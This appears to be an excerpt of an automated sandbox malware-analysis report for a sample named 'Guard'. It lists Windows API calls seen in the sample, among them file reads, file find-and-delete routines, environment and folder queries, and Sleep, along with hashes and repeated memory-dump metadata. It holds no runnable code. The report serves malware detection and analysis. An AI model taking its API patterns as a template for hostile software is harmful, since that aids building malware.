                                                                        • Part of subcall function 006C48B0: _memmove.LIBCMT ref: 006C48FA
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                      • String ID:
                                                                      • API String ID: 1396898556-0
                                                                      • Opcode ID: 16e3dbbbae762520a2ad5dc104098ed8d72f4ab34863cbe3c58f1f6649f574fe
                                                                      • Instruction ID: d6cbd26607e4536e77a8462d98c57d9851eade234079468e65bb6158169f6f42
                                                                      • Opcode Fuzzy Hash: 16e3dbbbae762520a2ad5dc104098ed8d72f4ab34863cbe3c58f1f6649f574fe
                                                                      • Instruction Fuzzy Hash: FD11E731650205ABCB20FBB4CC2AFBE77AADF44711F10842DF545A61C5EF749E11A798
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 6b85d9d61af98bbdbc5905055ccc94418bc220a7ee4fb247ea65ada0a987c8f9
                                                                      • Instruction ID: baddfb81f63155602de2d2efcf5b27cdddf8b1a014effbd0371585c0bf7d62a2
                                                                      • Opcode Fuzzy Hash: 6b85d9d61af98bbdbc5905055ccc94418bc220a7ee4fb247ea65ada0a987c8f9
                                                                      • Instruction Fuzzy Hash: 432125B4908341DFDB54DF14C444B9ABBE2BF85304F05896CF98A5B322C735E889CB96
                                                                      APIs
                                                                      • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,006C3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 006C4276
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 29c394f74379dae1709780d072edaca47b5cd3eccec18c278fe192179e292a1d
                                                                      • Instruction ID: f0f23fb15626a132022d3bd5f0043e886003803eb265bd49333d97bf2ba05ae9
                                                                      • Opcode Fuzzy Hash: 29c394f74379dae1709780d072edaca47b5cd3eccec18c278fe192179e292a1d
                                                                      • Instruction Fuzzy Hash: 3C1128312007019FD330CF55C491FA6B7EAEF88710F14C92EE9AA86A50DB75EA45CB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                      • Instruction ID: edcbd3056a7c76880a65ea1b4587c03b28a7317d4057f6e93c5529b05b83f6e1
                                                                      • Opcode Fuzzy Hash: 0a78885edf71d424e7563c00fb0e003dde73f860971e72194576d82374af60c9
                                                                      • Instruction Fuzzy Hash: 96017CB5600502ABC315EB28C451E2AF7AAFF8A350714815EF919C7702DB31AC21CBE4
                                                                      APIs
                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00724998
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentVariable
                                                                      • String ID:
                                                                      • API String ID: 1431749950-0
                                                                      • Opcode ID: 0f9d7b4e2a99f4261c80f69b04d8e2f66bb6f7cc34237bee8c4bcfdd4782a63d
                                                                      • Instruction ID: d1d8d088ffb14d5fb6c7832b4eb869833a723d14446b7338504eaa31276471ac
                                                                      • Opcode Fuzzy Hash: 0f9d7b4e2a99f4261c80f69b04d8e2f66bb6f7cc34237bee8c4bcfdd4782a63d
                                                                      • Instruction Fuzzy Hash: C1F03135608104BF9B54FB65D84ADAF77BDEF45320B00405AF9099B391DE74BD81C754
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: _fseek
                                                                      • String ID:
                                                                      • API String ID: 2937370855-0
                                                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                      • Instruction ID: cab3cfcab93185549ca04165c3a7795feab01a3eeffc03f50eff15d74ec9bc80
                                                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                      • Instruction Fuzzy Hash: FDF085B6800208FFDF108F94DC00DEBBBBAEF89720F04419CF9045A210D232EA218BA0
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,?,006C27AF,?,00000001), ref: 006C4A63
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary
                                                                      • String ID:
                                                                      • API String ID: 3664257935-0
                                                                      • Opcode ID: f49cfb3c198d30568ab7372574cd5999b9264cb8ae13c80a5ec9c4ec73f8e81c
                                                                      • Instruction ID: 7fa5c8709cbde4ba4155f8b5567d38eab34a1a847ad1bd30883eebb0a3eb4c3b
                                                                      • Opcode Fuzzy Hash: f49cfb3c198d30568ab7372574cd5999b9264cb8ae13c80a5ec9c4ec73f8e81c
                                                                      • Instruction Fuzzy Hash: A9F0F271145701CFCB34DFA4E4A0A6ABBF2EB14365320A92EE5A682614CB319984DB48
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock
                                                                      • String ID:
                                                                      • API String ID: 2638373210-0
                                                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                      • Instruction ID: 97aaf00d3af9f7d7a0f78079d3b962eb509982cf354c8922a31432add288d1be
                                                                      • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                      • Instruction Fuzzy Hash: 1EF0F87240020DFFDF05CF94C941EAABB79FB14314F208589FD198A252D776EA21AB91
                                                                      APIs
                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 006D09E4
                                                                        • Part of subcall function 006C1821: _memmove.LIBCMT ref: 006C185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: LongNamePath_memmove
                                                                      • String ID:
                                                                      • API String ID: 2514874351-0
                                                                      • Opcode ID: 1c53bb552cdb87e0ac276cc0f39a4578f5c81416d10a7d9ba9c7d46b373e3925
                                                                      • Instruction ID: e34adf5712280d70bcf86dd3aa634f9741c8937791f2f5151ba2ad7e9464cb5b
                                                                      • Opcode Fuzzy Hash: 1c53bb552cdb87e0ac276cc0f39a4578f5c81416d10a7d9ba9c7d46b373e3925
                                                                      • Instruction Fuzzy Hash: 01E0263290022817C72096989C05FEE77DDDB8A690F0002BBFC08C7204D9709C8086D4
                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00714D31
                                                                        • Part of subcall function 006C1821: _memmove.LIBCMT ref: 006C185B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FolderPath_memmove
                                                                      • String ID:
                                                                      • API String ID: 3334745507-0
                                                                      • Opcode ID: eeef1403da83ad6f1d79cd1ac4c04c7386fc092742893d48e0514f96dc8482aa
                                                                      • Instruction ID: 98cf3424c59a64e884280e8d5008a571a9e1bcc6eeb35100997e4f379471b942
                                                                      • Opcode Fuzzy Hash: eeef1403da83ad6f1d79cd1ac4c04c7386fc092742893d48e0514f96dc8482aa
                                                                      • Instruction Fuzzy Hash: A6D05EA590032C2BDB60E6A89C0DDB77BACD746220F0006A67D5CC3102E9349D4586E0
                                                                      APIs
                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,007006E6,00000000,00000000,00000000), ref: 006C42BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 99ac126eac46116cfc2ada0b9d5011289c00c3a613d8c0f3bd171386995952ae
                                                                      • Instruction ID: 97f97f505636e98e886e3bb6a5a294a61842905081a8d132efd55e0f7a2eb066
                                                                      • Opcode Fuzzy Hash: 99ac126eac46116cfc2ada0b9d5011289c00c3a613d8c0f3bd171386995952ae
                                                                      • Instruction Fuzzy Hash: 09D0C77464020CBFE710CB80DC46FAD777CEB05710F100195FE0466290D6B27D508795
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00713BFE), ref: 00714FED
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: d6379b3aae48cdef15e42a1e4286a8438b62934217e9905d06f2eaa13497485e
                                                                      • Instruction ID: 96ced9b9ca579b7efb9beae485fc99de00410186b276defb7068873be00e3371
                                                                      • Opcode Fuzzy Hash: d6379b3aae48cdef15e42a1e4286a8438b62934217e9905d06f2eaa13497485e
                                                                      • Instruction Fuzzy Hash: 47B092390006005A9E281E3C19680DD338958433A97DC1B82E978856E1933D888BA5A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 5da979c6922813ebe62287e8d060465626b4516d62a451c89081a66bdc4e2601
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 7531B771E001099BE718DF59C480AA9F7A6FF99300F648AA6E409CB352E731EDC1CBC0
                                                                      APIs
                                                                        • Part of subcall function 00714005: FindFirstFileW.KERNEL32(?,?), ref: 0071407C
                                                                        • Part of subcall function 00714005: DeleteFileW.KERNEL32(?,?,?,?), ref: 007140CC
                                                                        • Part of subcall function 00714005: FindNextFileW.KERNEL32(00000000,00000010), ref: 007140DD
                                                                        • Part of subcall function 00714005: FindClose.KERNEL32(00000000), ref: 007140F4
                                                                      • GetLastError.KERNEL32 ref: 0071C292
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                      • String ID:
                                                                      • API String ID: 2191629493-0
                                                                      • Opcode ID: b87f12bd396d59c22a34cb1c5369dd3d75a0bf55e0dbccd3c2a16507e708a4e0
                                                                      • Instruction ID: a9c420b8212283f0f8941d10aa170770d85be55381954f6f1ca09cf7c6ab481b
                                                                      • Opcode Fuzzy Hash: b87f12bd396d59c22a34cb1c5369dd3d75a0bf55e0dbccd3c2a16507e708a4e0
                                                                      • Instruction Fuzzy Hash: D0F082312101108FCB10EF59D844FA9B7E6AF48720F05845DF94587352CB74BC41CB98
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,00000000,006F2F8B), ref: 006C42EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3290123457.00000000006B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 006B0000, based on PE: true
                                                                      • Associated: 00000014.00000002.3290081970.00000000006B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000740000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290228278.0000000000766000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290323369.0000000000770000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                      • Associated: 00000014.00000002.3290357798.0000000000779000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_6b0000_Guard.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 43504513b66758d147a7d4c6784c658e5493abd830c5ae47b850f1c018e3b772
                                                                      • Instruction ID: 3b8597ce1d8601116e822dc05fc78b0577031c3dac752fb9ece025b8cc0e5d45
                                                                      • Opcode Fuzzy Hash: 43504513b66758d147a7d4c6784c658e5493abd830c5ae47b850f1c018e3b772
                                                                      • Instruction Fuzzy Hash: 1AE09279400B01CFC3318F1AE815862FBE5FFE13613214A2EE4E692660D7B4599ADB90